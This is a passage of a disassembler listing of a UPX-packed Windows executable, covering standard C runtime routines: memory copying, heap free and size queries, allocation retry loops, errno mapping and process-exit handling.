push ebp
call sub_404EFE
pop ecx
call sub_4053C0
mov dword ptr [eax], 0Ch
xor eax, eax
pop ebp
retn
sub_404E31 endp
; =============== S U B R O U T I N E =======================================
sub_404EF4 proc near ; CODE XREF: sub_405819+9�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_410154, eax
retn
sub_404EF4 endp
; =============== S U B R O U T I N E =======================================
sub_404EFE proc near ; CODE XREF: sub_402371+B�p
; sub_404E31+8C�p ...
arg_0 = dword ptr 4
push ds:dword_410154
call sub_40470B
test eax, eax
pop ecx
jz short loc_404F1D
push [esp+arg_0]
call eax ; sub_40B144
test eax, eax
pop ecx
jz short loc_404F1D
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_404F1D: ; CODE XREF: sub_404EFE+E�j
; sub_404EFE+19�j
xor eax, eax
retn
sub_404EFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F20 proc near ; CODE XREF: sub_4023DB�j sub_4024AF+F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00404F7F SIZE 0000002F BYTES
push 0Ch
push offset dword_40DF08
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_404FA8
cmp ds:dword_4108E4, 3
jnz short loc_404F7F
push 4
call sub_4079D2
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_40854D
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_404F5F
push esi
push eax
call sub_408578
pop ecx
pop ecx
loc_404F5F: ; CODE XREF: sub_404F20+34�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_404F76
cmp [ebp+var_1C], 0
jnz short loc_404FA8
push [ebp+arg_0]
jmp short loc_404F80
sub_404F20 endp
; =============== S U B R O U T I N E =======================================
sub_404F76 proc near ; CODE XREF: sub_404F20+46�p
; DATA XREF: UPX1:0040DF20�o
push 4
call sub_4078FA
pop ecx
retn
sub_404F76 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404F20
loc_404F7F: ; CODE XREF: sub_404F20+1A�j
push esi
loc_404F80: ; CODE XREF: sub_404F20+54�j
push 0
push ds:dword_4105D4
call dword_40C048 ; RtlFreeHeap
test eax, eax
jnz short loc_404FA8
call sub_4053C0
mov esi, eax
call dword_40C088 ; RtlGetLastWin32Error
push eax
call sub_405385
mov [esi], eax
pop ecx
loc_404FA8: ; CODE XREF: sub_404F20+11�j
; sub_404F20+4F�j ...
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_404F20
; =============== S U B R O U T I N E =======================================
sub_404FAE proc near ; CODE XREF: sub_4023F1+31�p
; sub_402457+3D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_0]
push ebx
xor ebx, ebx
cmp ecx, ebx
push esi
push edi
jz short loc_404FC3
mov edi, [esp+0Ch+arg_4]
cmp edi, ebx
ja short loc_404FDE
loc_404FC3: ; CODE XREF: sub_404FAE+B�j
; sub_404FAE+3A�j
call sub_4053C0
push 16h
pop esi
mov [eax], esi
loc_404FCD: ; CODE XREF: sub_404FAE+5D�j
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402191
add esp, 14h
mov eax, esi
jmp short loc_40500F
; ---------------------------------------------------------------------------
loc_404FDE: ; CODE XREF: sub_404FAE+13�j
mov esi, [esp+0Ch+arg_8]
cmp esi, ebx
jnz short loc_404FEA
mov [ecx], bl
jmp short loc_404FC3
; ---------------------------------------------------------------------------
loc_404FEA: ; CODE XREF: sub_404FAE+36�j
mov edx, ecx
loc_404FEC: ; CODE XREF: sub_404FAE+49�j
mov al, [esi]
mov [edx], al
inc edx
inc esi
cmp al, bl
jz short loc_404FF9
dec edi
jnz short loc_404FEC
loc_404FF9: ; CODE XREF: sub_404FAE+46�j
cmp edi, ebx
jnz short loc_40500D
mov [ecx], bl
call sub_4053C0
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_404FCD
; ---------------------------------------------------------------------------
loc_40500D: ; CODE XREF: sub_404FAE+4D�j
xor eax, eax
loc_40500F: ; CODE XREF: sub_404FAE+2E�j
pop edi
pop esi
pop ebx
retn
sub_404FAE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405020 proc near ; CODE XREF: sub_4024EE+43�p
; sub_4065E3+11D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_405040
cmp edi, eax
jb loc_4051E4
loc_405040: ; CODE XREF: sub_405020+16�j
cmp ecx, 100h
jb short loc_405067
cmp ds:dword_410A1C, 0
jz short loc_405067
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jnz short loc_405067
pop esi
pop edi
pop ebp
jmp sub_40908B
; ---------------------------------------------------------------------------
loc_405067: ; CODE XREF: sub_405020+26�j
; sub_405020+2F�j ...
test edi, 3
jnz short loc_405084
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4050A4
rep movsd
jmp off_405194[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_405084: ; CODE XREF: sub_405020+4D�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_40509C
and eax, 3
add ecx, eax
jmp dword ptr loc_4050A4+4[eax*4]
; ---------------------------------------------------------------------------
loc_40509C: ; CODE XREF: sub_405020+6E�j
jmp dword ptr loc_4051A4[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4050A4: ; CODE XREF: sub_405020+58�j
; sub_405020+B6�j ...
jmp off_405128[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4050B8
dd offset loc_4050E4
dd offset loc_405108
; ---------------------------------------------------------------------------
loc_4050B8: ; DATA XREF: sub_405020+8C�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4050A4
rep movsd
jmp off_405194[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_4050E4: ; DATA XREF: sub_405020+90�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4050A4
rep movsd
jmp off_405194[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_405108: ; DATA XREF: sub_405020+94�o
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_4050A4
rep movsd
jmp off_405194[edx*4]
; ---------------------------------------------------------------------------
align 4
off_405128 dd offset loc_40518B ; DATA XREF: sub_405020:loc_4050A4�r
dd offset loc_405178
dd offset loc_405170
dd offset loc_405168
dd offset loc_405160
dd offset loc_405158
dd offset loc_405150
dd offset loc_405148
; ---------------------------------------------------------------------------
loc_405148: ; CODE XREF: sub_405020:loc_4050A4�j
; DATA XREF: sub_405020+124�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_405150: ; CODE XREF: sub_405020:loc_4050A4�j
; DATA XREF: sub_405020+120�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_405158: ; CODE XREF: sub_405020:loc_4050A4�j
; DATA XREF: sub_405020+11C�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_405160: ; CODE XREF: sub_405020:loc_4050A4�j
; DATA XREF: sub_405020+118�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_405168: ; CODE XREF: sub_405020:loc_4050A4�j
; DATA XREF: sub_405020+114�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_405170: ; CODE XREF: sub_405020:loc_4050A4�j
; DATA XREF: sub_405020+110�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_405178: ; CODE XREF: sub_405020:loc_4050A4�j
; DATA XREF: sub_405020+10C�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40518B: ; CODE XREF: sub_405020:loc_4050A4�j
; DATA XREF: sub_405020:off_405128�o
jmp off_405194[edx*4]
; ---------------------------------------------------------------------------
align 4
off_405194 dd offset loc_4051A4 ; DATA XREF: sub_405020+5C�r
; sub_405020+BA�r ...
dd offset loc_4051AC
dd offset loc_4051B8
dd offset loc_4051CC
; ---------------------------------------------------------------------------
loc_4051A4: ; CODE XREF: sub_405020+5C�j
; sub_405020+BA�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4051AC: ; CODE XREF: sub_405020+5C�j
; sub_405020+BA�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4051B8: ; CODE XREF: sub_405020+5C�j
; sub_405020+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4051CC: ; CODE XREF: sub_405020+5C�j
; sub_405020+BA�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4051E4: ; CODE XREF: sub_405020+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_405218
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40520C
std
rep movsd
cld
jmp off_405330[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40520C: ; CODE XREF: sub_405020+1DD�j
; sub_405020+238�j ...
neg ecx
jmp off_4052E0[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_405218: ; CODE XREF: sub_405020+1D2�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_405230
and eax, 3
sub ecx, eax
jmp dword ptr loc_405230+4[eax*4]
; ---------------------------------------------------------------------------
loc_405230: ; CODE XREF: sub_405020+202�j
; DATA XREF: sub_405020+209�r
jmp off_405330[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_405243+1
; ---------------------------------------------------------------------------
push 90004052h
push edx
inc eax
loc_405243: ; DATA XREF: sub_405020+218�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_40520C
std
rep movsd
cld
jmp off_405330[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_40520C
std
rep movsd
cld
jmp off_405330[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_40520C
std
rep movsd
cld
jmp off_405330[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4052E4
dd offset loc_4052EC
dd offset loc_4052F4
dd offset loc_4052FC
dd offset loc_405304
dd offset loc_40530C
dd offset loc_405314
off_4052E0 dd offset loc_405327 ; DATA XREF: sub_405020+1EE�r
; ---------------------------------------------------------------------------
loc_4052E4: ; DATA XREF: sub_405020+2A4�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_4052EC: ; DATA XREF: sub_405020+2A8�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_4052F4: ; DATA XREF: sub_405020+2AC�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_4052FC: ; DATA XREF: sub_405020+2B0�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_405304: ; DATA XREF: sub_405020+2B4�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40530C: ; DATA XREF: sub_405020+2B8�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_405314: ; DATA XREF: sub_405020+2BC�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_405327: ; CODE XREF: sub_405020+1EE�j
; DATA XREF: sub_405020:off_4052E0�o
jmp off_405330[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_405330 dd offset loc_405340 ; DATA XREF: sub_405020+1E3�r
; sub_405020:loc_405230�r ...
dd offset loc_405348
dd offset loc_405358
dd offset loc_40536C
; ---------------------------------------------------------------------------
loc_405340: ; CODE XREF: sub_405020+1E3�j
; sub_405020:loc_405230�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_405348: ; CODE XREF: sub_405020+1E3�j
; sub_405020:loc_405230�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_405358: ; CODE XREF: sub_405020+1E3�j
; sub_405020:loc_405230�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40536C: ; CODE XREF: sub_405020+1E3�j
; sub_405020:loc_405230�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_405020 endp
; =============== S U B R O U T I N E =======================================
sub_405385 proc near ; CODE XREF: sub_404F20+80�p
; sub_40928C+182�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_40538B: ; CODE XREF: sub_405385+13�j
cmp eax, ds:dword_40F070[ecx*8]
jz short loc_4053A6
inc ecx
cmp ecx, 2Dh
jb short loc_40538B
lea ecx, [eax-13h]
cmp ecx, 11h
ja short loc_4053AE
push 0Dh
pop eax
retn
; ---------------------------------------------------------------------------
loc_4053A6: ; CODE XREF: sub_405385+D�j
mov eax, ds:dword_40F074[ecx*8]
retn
; ---------------------------------------------------------------------------
loc_4053AE: ; CODE XREF: sub_405385+1B�j
add eax, 0FFFFFF44h
push 0Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 8
retn
sub_405385 endp
; =============== S U B R O U T I N E =======================================
sub_4053C0 proc near ; CODE XREF: sub_4024EE:loc_402505�p
; sub_4024EE+66�p ...
call sub_4048B0
test eax, eax
jnz short loc_4053CF
mov eax, offset dword_40F1D8
retn
; ---------------------------------------------------------------------------
loc_4053CF: ; CODE XREF: sub_4053C0+7�j
add eax, 8
retn
sub_4053C0 endp
; =============== S U B R O U T I N E =======================================
sub_4053D3 proc near ; CODE XREF: sub_40652A+7C�p
; sub_4065E3+9A�p ...
arg_0 = dword ptr 4
push esi
push edi
xor esi, esi
loc_4053D7: ; CODE XREF: sub_4053D3+39�j
push [esp+8+arg_0]
call sub_404E31
mov edi, eax
test edi, edi
pop ecx
jnz short loc_40540E
cmp ds:dword_410158, eax
jbe short loc_40540E
push esi
call dword_40C090 ; Sleep
lea eax, [esi+3E8h]
cmp eax, ds:dword_410158
jbe short loc_405407
or eax, 0FFFFFFFFh
loc_405407: ; CODE XREF: sub_4053D3+2F�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_4053D7
loc_40540E: ; CODE XREF: sub_4053D3+12�j
; sub_4053D3+1A�j
mov eax, edi
pop edi
pop esi
retn
sub_4053D3 endp
; =============== S U B R O U T I N E =======================================
sub_405413 proc near ; CODE XREF: sub_402622+5�p
; sub_4048B0+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_405417: ; CODE XREF: sub_405413+41�j
push 0
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40916E
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_405456
cmp ds:dword_410158, eax
jbe short loc_405456
push esi
call dword_40C090 ; Sleep
lea eax, [esi+3E8h]
cmp eax, ds:dword_410158
jbe short loc_40544F
or eax, 0FFFFFFFFh
loc_40544F: ; CODE XREF: sub_405413+37�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_405417
loc_405456: ; CODE XREF: sub_405413+1A�j
; sub_405413+22�j
mov eax, edi
pop edi
pop esi
retn
sub_405413 endp
; =============== S U B R O U T I N E =======================================
sub_40545B proc near ; CODE XREF: sub_402569+5C�p
; sub_402569+73�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push edi
xor esi, esi
loc_40545F: ; CODE XREF: sub_40545B+44�j
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_40928C
mov edi, eax
test edi, edi
pop ecx
pop ecx
jnz short loc_4054A1
cmp [esp+8+arg_4], eax
jz short loc_4054A1
cmp ds:dword_410158, eax
jbe short loc_4054A1
push esi
call dword_40C090 ; Sleep
lea eax, [esi+3E8h]
cmp eax, ds:dword_410158
jbe short loc_40549A
or eax, 0FFFFFFFFh
loc_40549A: ; CODE XREF: sub_40545B+3A�j
cmp eax, 0FFFFFFFFh
mov esi, eax
jnz short loc_40545F
loc_4054A1: ; CODE XREF: sub_40545B+17�j
; sub_40545B+1D�j ...
mov eax, edi
pop edi
pop esi
retn
sub_40545B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4054A6 proc near ; CODE XREF: sub_402569+3A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_40DF28
call __SEH_prolog4
xor eax, eax
mov ebx, [ebp+arg_0]
xor edi, edi
cmp ebx, edi
setnz al
cmp eax, edi
jnz short loc_4054DF
call sub_4053C0
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_402191
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_405532
; ---------------------------------------------------------------------------
loc_4054DF: ; CODE XREF: sub_4054A6+1A�j
cmp ds:dword_4108E4, 3
jnz short loc_405520
push 4
call sub_4079D2
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_40854D
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_40550C
mov esi, [ebx-4]
sub esi, 9
mov [ebp+var_1C], esi
jmp short loc_40550F
; ---------------------------------------------------------------------------
loc_40550C: ; CODE XREF: sub_4054A6+59�j
mov esi, [ebp+var_1C]
loc_40550F: ; CODE XREF: sub_4054A6+64�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_405540
cmp [ebp+var_20], edi
jnz short loc_405530
loc_405520: ; CODE XREF: sub_4054A6+40�j
push ebx
push edi
push ds:dword_4105D4
call dword_40C094 ; RtlSizeHeap
mov esi, eax
loc_405530: ; CODE XREF: sub_4054A6+78�j
mov eax, esi
loc_405532: ; CODE XREF: sub_4054A6+37�j
call __SEH_epilog4
retn
sub_4054A6 endp
; =============== S U B R O U T I N E =======================================
sub_405538 proc near ; DATA XREF: UPX1:0040DF40�o
xor edi, edi
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_405538 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_405540 proc near ; CODE XREF: sub_4054A6+70�p
push 4
call sub_4078FA
pop ecx
retn
sub_405540 endp
; =============== S U B R O U T I N E =======================================
sub_405549 proc near ; CODE XREF: start-F8C6�p start-F8A0�p ...
arg_0 = dword ptr 4
call sub_4060C3
push [esp+arg_0]
call sub_405F23
push ds:dword_40F1E0
call sub_40470B
push 0FFh
call eax
add esp, 0Ch
retn
sub_405549 endp
; =============== S U B R O U T I N E =======================================
sub_40556D proc near ; CODE XREF: sub_405593+4�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call dword_40C064 ; GetModuleHandleA
test eax, eax
jz short locret_405592
push offset aCorexitprocess ; "CorExitProcess"
push eax
call dword_40C068 ; GetProcAddress
test eax, eax
jz short locret_405592
push [esp+arg_0]
call eax ; sub_40B144
locret_405592: ; CODE XREF: sub_40556D+D�j
; sub_40556D+1D�j
retn
sub_40556D endp
; =============== S U B R O U T I N E =======================================
sub_405593 proc near ; CODE XREF: sub_403EFE+1C�p
; sub_404E31+34�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_40556D
pop ecx
push [esp+arg_0]
call dword_40C098 ; ExitProcess
int 3 ; Trap to Debugger
sub_405593 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4055A8 proc near ; CODE XREF: sub_402651+C�p
push 8
call sub_4079D2
pop ecx
retn
sub_4055A8 endp
; =============== S U B R O U T I N E =======================================
sub_4055B1 proc near ; CODE XREF: sub_402687�p
push 8
call sub_4078FA
pop ecx
retn
sub_4055B1 endp
; =============== S U B R O U T I N E =======================================
sub_4055BA proc near ; CODE XREF: sub_4056F7+8C�p
; sub_4056F7+9C�p
arg_0 = dword ptr 4
push esi
mov esi, eax
jmp short loc_4055CA
; ---------------------------------------------------------------------------
loc_4055BF: ; CODE XREF: sub_4055BA+14�j
mov eax, [esi]
test eax, eax
jz short loc_4055C7
call eax
loc_4055C7: ; CODE XREF: sub_4055BA+9�j
add esi, 4
loc_4055CA: ; CODE XREF: sub_4055BA+3�j
cmp esi, [esp+4+arg_0]
jb short loc_4055BF
pop esi
retn
sub_4055BA endp
; =============== S U B R O U T I N E =======================================
sub_4055D2 proc near ; CODE XREF: sub_405665+32�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor eax, eax
jmp short loc_4055EA
; ---------------------------------------------------------------------------
loc_4055DB: ; CODE XREF: sub_4055D2+1C�j
test eax, eax
jnz short loc_4055F0
mov ecx, [esi]
test ecx, ecx
jz short loc_4055E7
call ecx
loc_4055E7: ; CODE XREF: sub_4055D2+11�j
add esi, 4
loc_4055EA: ; CODE XREF: sub_4055D2+7�j
cmp esi, [esp+4+arg_4]
jb short loc_4055DB
loc_4055F0: ; CODE XREF: sub_4055D2+B�j
pop esi
retn
sub_4055D2 endp
; =============== S U B R O U T I N E =======================================
sub_4055F2 proc near ; CODE XREF: sub_4069A0+12�p
; sub_409843+27�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
xor esi, esi
cmp ecx, esi
jnz short loc_40561A
loc_4055FD: ; CODE XREF: sub_4055F2+2F�j
call sub_4053C0
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402191
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40561A: ; CODE XREF: sub_4055F2+9�j
mov eax, ds:dword_410160
cmp eax, esi
jz short loc_4055FD
mov [ecx], eax
xor eax, eax
pop esi
retn
sub_4055F2 endp
; =============== S U B R O U T I N E =======================================
sub_405629 proc near ; CODE XREF: sub_404628+16�p
; sub_4069A0+2D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_405651
loc_405634: ; CODE XREF: sub_405629+2E�j
call sub_4053C0
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402191
add esp, 14h
push 16h
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_405651: ; CODE XREF: sub_405629+9�j
cmp ds:dword_410160, esi
jz short loc_405634
mov ecx, ds:dword_41016C
mov [eax], ecx
xor eax, eax
pop esi
retn
sub_405629 endp
; =============== S U B R O U T I N E =======================================
sub_405665 proc near ; CODE XREF: start-F888�p
arg_0 = dword ptr 4
cmp ds:dword_410A10, 0
jz short loc_405688
push offset dword_410A10
call sub_409550
test eax, eax
pop ecx
jz short loc_405688
push [esp+arg_0]
call ds:dword_410A10
pop ecx
loc_405688: ; CODE XREF: sub_405665+7�j
; sub_405665+16�j
call sub_4094A7
push offset dword_40C158
push offset dword_40C140
call sub_4055D2
test eax, eax
pop ecx
pop ecx
jnz short locret_4056F6
push esi
push edi
push offset sub_40697C
call sub_40268D
mov esi, offset dword_40C134
mov eax, esi
mov edi, offset dword_40C13C
cmp eax, edi
pop ecx
jnb short loc_4056CE
loc_4056BF: ; CODE XREF: sub_405665+67�j
mov eax, [esi]
test eax, eax
jz short loc_4056C7
call eax
loc_4056C7: ; CODE XREF: sub_405665+5E�j
add esi, 4
cmp esi, edi
jb short loc_4056BF
loc_4056CE: ; CODE XREF: sub_405665+58�j
cmp ds:dword_410A14, 0
pop edi
pop esi
jz short loc_4056F4
push offset dword_410A14
call sub_409550
test eax, eax
pop ecx
jz short loc_4056F4
push 0
push 2
push 0
call ds:dword_410A14
loc_4056F4: ; CODE XREF: sub_405665+72�j
; sub_405665+81�j
xor eax, eax
locret_4056F6: ; CODE XREF: sub_405665+3B�j
retn
sub_405665 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056F7 proc near ; CODE XREF: sub_4057D9+8�p
; sub_4057EA+8�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 004057D3 SIZE 00000006 BYTES
push 10h
push offset dword_40DF48
call __SEH_prolog4
push 8
call sub_4079D2
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
xor ebx, ebx
inc ebx
cmp ds:dword_4101A0, ebx
jz short loc_405799
mov ds:dword_41019C, ebx
mov al, byte ptr [ebp+arg_8]
mov ds:byte_410198, al
cmp [ebp+arg_4], edi
jnz short loc_405789
push ds:dword_410A08
call sub_40470B
mov [ebp+var_1C], eax
push ds:dword_410A04
call sub_40470B
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_20], esi
cmp [ebp+var_1C], edi
jz short loc_405779
loc_405753: ; CODE XREF: sub_4056F7+6A�j
; sub_4056F7+75�j ...
sub esi, 4
mov [ebp+var_20], esi
cmp esi, [ebp+var_1C]
jb short loc_405779
cmp dword ptr [esi], 0
jz short loc_405753
mov edi, [esi]
call sub_404702
cmp edi, eax
jz short loc_405753
push edi
call sub_40470B
pop ecx
call eax
jmp short loc_405753
; ---------------------------------------------------------------------------
loc_405779: ; CODE XREF: sub_4056F7+5A�j
; sub_4056F7+65�j
push offset dword_40C160
mov eax, offset dword_40C15C
call sub_4055BA
pop ecx
loc_405789: ; CODE XREF: sub_4056F7+35�j
push offset dword_40C168
mov eax, offset dword_40C164
call sub_4055BA
pop ecx
loc_405799: ; CODE XREF: sub_4056F7+22�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4057C4
cmp [ebp+arg_8], 0
jnz short loc_4057D3
mov ds:dword_4101A0, ebx
push 8
call sub_4078FA
pop ecx
push [ebp+arg_0]
call sub_405593
loc_4057C1: ; DATA XREF: UPX1:0040DF60�o
xor ebx, ebx
inc ebx
sub_4056F7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4057C4 proc near ; CODE XREF: sub_4056F7+A9�p
cmp dword ptr [ebp+10h], 0
jz short locret_4057D2
push 8
call sub_4078FA
pop ecx
locret_4057D2: ; CODE XREF: sub_4057C4+4�j
retn
sub_4057C4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4056F7
loc_4057D3: ; CODE XREF: sub_4056F7+B2�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_4056F7
; =============== S U B R O U T I N E =======================================
sub_4057D9 proc near ; CODE XREF: start-F84C�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_4056F7
add esp, 0Ch
retn
sub_4057D9 endp
; =============== S U B R O U T I N E =======================================
sub_4057EA proc near ; CODE XREF: UPX0:00404114�p
; sub_409665+D9�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_4056F7
add esp, 0Ch
retn
sub_4057EA endp
; =============== S U B R O U T I N E =======================================
sub_4057FB proc near ; CODE XREF: start:loc_4040E9�p
push 1
push 0
push 0
call sub_4056F7
add esp, 0Ch
retn
sub_4057FB endp
; =============== S U B R O U T I N E =======================================
sub_40580A proc near ; CODE XREF: UPX0:loc_404119�p
push 1
push 1
push 0
call sub_4056F7
add esp, 0Ch
retn
sub_40580A endp
; =============== S U B R O U T I N E =======================================
sub_405819 proc near ; CODE XREF: sub_404A60+C4�p
push esi
call sub_404702
mov esi, eax
push esi
call sub_404EF4
push esi
call sub_409829
push esi
call sub_40208B
push esi
call sub_40981F
push esi
call sub_409815
push esi
call sub_40960B
push esi
call nullsub_1
push esi
call sub_4077F6
push offset sub_4057EA
call sub_404694
add esp, 24h
mov ds:dword_40F1E0, eax
pop esi
retn
sub_405819 endp
; ---------------------------------------------------------------------------
align 4
